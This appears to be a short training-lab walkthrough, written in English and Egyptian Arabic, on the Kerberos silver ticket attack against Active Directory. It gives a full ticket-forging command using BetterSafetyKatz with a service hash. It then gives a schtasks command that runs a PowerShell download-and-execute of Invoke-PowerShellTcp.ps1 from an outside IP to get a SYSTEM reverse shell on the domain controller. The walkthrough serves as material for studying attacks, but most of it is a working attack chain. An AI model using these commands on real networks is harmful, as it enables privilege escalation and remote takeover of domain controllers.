The silver ticket is an attack that we pretend to be the domain admin for a service

من الاخر كده السيلفر تكيت دي بتقدر تضحك علي السيرفيس ايا كانت و تتعامل معاها علي انك دومين ادمن و الشرط الوحيد ليها عشان تشتغل انك يكون معاك الهاش بتاع السيرفيس ال انت عاوز تستخدمها اكنك دومين ادمن

The service that is user to run Winrs and PS Remoting is called HTTP service and it worth forging when it comes to the silver ticket attack

HOST Service —> Access to Schedule Task

RPCSS Service —> Access to WMI

HTTP Service —> Access to Winrs and PS Remoting

Let’s try to forge the HOST service to and make it execute reverse shell for us

.\\BetterSafetyKatz.exe '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /service:HOST /target:dcorp-dc.dollarcorp.moneycorp.local /rc4:e9bb4c3d1327e29093dfecab8c2676f6 /startoffset:0 /endin:600 /renewmax:10080 /id:500 /ptt"' "exit"

Now let’s list tickets

klist

Notice that we have access to the HOST service now

Now let’s create a fake schedule task for us to gain reverse shell

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''<http://172.16.100.22/Invoke-PowerShellTcp.ps1>''')'"